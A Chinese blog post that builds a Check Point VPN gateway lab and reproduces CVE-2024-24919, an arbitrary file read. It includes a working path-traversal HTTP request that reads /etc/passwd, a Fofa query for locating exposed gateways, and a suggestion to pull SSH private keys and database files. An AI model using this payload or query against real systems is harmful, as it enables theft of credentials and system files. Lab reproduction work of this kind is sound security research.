【新洞随记】CVE-2024-24919：CheckPoint Remote Access VPN任意文件读取

原创 W01fh4cker 追梦信安 2024-05-30 23:39

零、前言

Fofa语句：

app=”Check_Point-SSL-Network-Extender”

本来对这个Check Point不熟悉，复现过程中也踩了很多坑，这个环境我也是反反复复搭建了很多次，看了很多遍油管上面的各种视频，逛了很长时间的官方交流论坛，参考Palo Alto Pan OS和Fortinet SSL VPN的搭建掌握了Check Point Gateway的使用和大部分命令，看国内平台好像没什么人提这个环境搭建的事情，就简单记录一下，水篇文章，后面会出一个系列：《完全零基础从0到1掌握Weblogic漏洞分析与利用》。

一、环境搭建

1.1 下载并导入Vmware

下载漏洞镜像，不需要登录，下下来会给你15天试用，到期了重装就可以了：

https://support.checkpoint.com/results/download/115148

导入到虚拟机里面：

命名随意，给2×2处理器内核总数：

内存给到8GB：

我个人喜欢给40GB空间，自己决定将就好：

1.2 安装镜像系统

开启该虚拟机，选择第一个选项：

等待一会出现以下界面时，回车继续：

还是OK：

填10和15：

输入密码，我这里设为admin123：

输入ip地址，它会自动填写默认网关，这个ip需要在你网卡的ip段里面（废话），然后按空格可以选择是否启用DHCP，我这里不启用：

开始安装：

等一会，安装完之后重启：

然后就可以登录进来了：

1.3 防火墙首次配置

访问https://192.168.198.171/并登录：

无脑下一步，这里取消勾选发送数据：

开始安装：

登录进来之后去下一个SmartConsole：

连接：

等一会就可以连上去了，如果提示系统还在初始化那就重连就可以了：

1.4 SmartConsole配置Check Point漏洞环境

由于后面要添加一个Mobile Access，用的也是443端口，会和门户界面的这个冲突，并且那个是无法自定义端口号的，所以该改这个。

改一下端口，挑一个不被占用的填就可以了，比如https://192.168.198.171:6657/：

加一条规则：

简单粗暴设置成any即可，如果想自行搭建研究可以参考油管上面的视频：

Services & Applications这里点击加号：

选择TCP：

名字随便写，字母开头就可以了，端口填之前的6657：

选择放行：

然后再按照刚才的步骤添加一个443端口的：

然后Publish并install：

然后访问https://192.168.198.171:6657/，确保没问题：

回到刚才的设置这里，勾选Mobile Access：

它会小卡一下，然后过一会会出来弹框：

无脑下一步，到这里把Mobile Mail这个去掉：

选择不适用AD：

密码随便填，我填的usertest：

结束：

访问https://192.168.198.171/sslvpn：

usertest登录没问题：

二、漏洞复现与拓展

POST /clients/MyCRL HTTP/1.1
Host: 192.168.198.171
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 39

aCSHELL/../../../../../../../etc/passwd

漏洞分析文章参考：

https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/

虚拟机的登录的话需要执行set expert-password来设置专家密码，然后再输入expert命令并输入密码即可登录控制台：

然后可以查找一些文件（如.NDB、.sqlite、/home/admin/.ssh/id_rsa等），可以自己寻找规律，编写自己的一份验证字典。